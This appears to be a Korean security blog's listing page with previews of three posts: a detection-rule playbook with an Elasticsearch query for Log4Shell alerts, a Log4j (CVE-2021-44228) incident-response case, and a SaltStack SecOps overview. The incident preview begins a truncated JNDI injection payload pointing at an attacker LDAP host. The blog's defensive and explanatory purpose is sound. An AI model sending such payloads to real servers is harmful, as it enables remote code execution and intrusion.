SECURITY/보안기술(SECOPS)

보안 위협 이벤트 탐지 룰 Playbook

Elasticsearch query Rule에 대한 보안 위협 탐지를 slack 알람으로 받는내용입니다. 일부는 메일로도 발송중.. 폐사는 주로 T사 APT 보안 솔루션을 활용하여 엘라스틱과 연동하여 사용중이며 해당 룰은 frequency(빈도), priority(우선순위)등 다양한 변수를 조합하여 운영중입니다. 대표적인 악성 행위에 대한 탐지 rule을 예로 든것입니다. Log4j Log4Shell 공격 탐지 query: deviceHostName:DDI AND name:("CVE-2021-44228 - OGNL EXPLOIT - HTTP(REQUEST)" OR "POSSIBLE HTTP HEADER OGNL EXPRESSION EXPLOIT - HTTP(REQUEST)" OR "POSSIBLE USE..

2022. 1. 28. 14:41

SECURITY/해킹사고 사례

[해킹사고사례] Log4j 취약점 공격 대응 사례 CVE-2021–44228

Log4j(log4shell) Vulnerabilities 올해 2021년 가장 HOT 했던 log4j 취약점에 대하여 개인적으로 정리차 오랫만에 블로그를 포스팅합니다. 덕분에 보안 업계 종사자 및 관련 분야 종사자들은 힘든 시기를 보냈죠 ^^ Log4j log4shell 취약점 = CVE-2021–44228 log4j 취약점에 대한 전반적인 내용은 인터넷에서 쉽게 찾을수 있어 실제 공격 당한(해킹) 사례를 관점으로 포스팅 하고자 합니다. 1. 침해 확인 (한창 뉴스에 도배될 시점 새벽) Apache + Tomcat (취약 버전) 실제 운영중인 사이트 ※ 공격 벡터는 다양함 (취약한 사이트의 로그인 창, 검색창, 메신져 대화창등) Payload Examples ${jndi:ldap://attackerma..

2021. 12. 30. 16:10

SECURITY/보안기술(SECOPS)

saltstack 활용 사례 / SECOPS

DevOps 와 마찬가지로 IT 분야에서 핫 트렌디한 "SecOps" 에 대한 포스팅을 해봅니다. 정의 DevOps가 소프트웨어 개발자 및 운영 전문가를 통합 하는 방식과 마찬가지로 SecOps는 보안 및 운영 팀을 연결하는 관리 방식 즉, 개발부터 서비스 론칭 단계까지의 전체 과정에 IT 보안 실무를 통합 할수 있는 모델이다. 목표 개발 초기 단계 또는 모든 단계에서 보안 프로세스를 도입, 접목 시키는것 지속적인 보안 컴플라이언스 자동화 보안에 대한 책임을 공유하여 비즈니스, 제품 및 서비스의 보안 상태를 향상 시키는 것 효과 ROI 향상 생산성 향상 리소스 감소 보안 문제 감소 보안 감사 절차 개선 SecOps 대표 활용 사례 IBM Cloud 는 saltstack 자동화 도구를 활용하여 SecOps..

2019. 10. 16. 16:08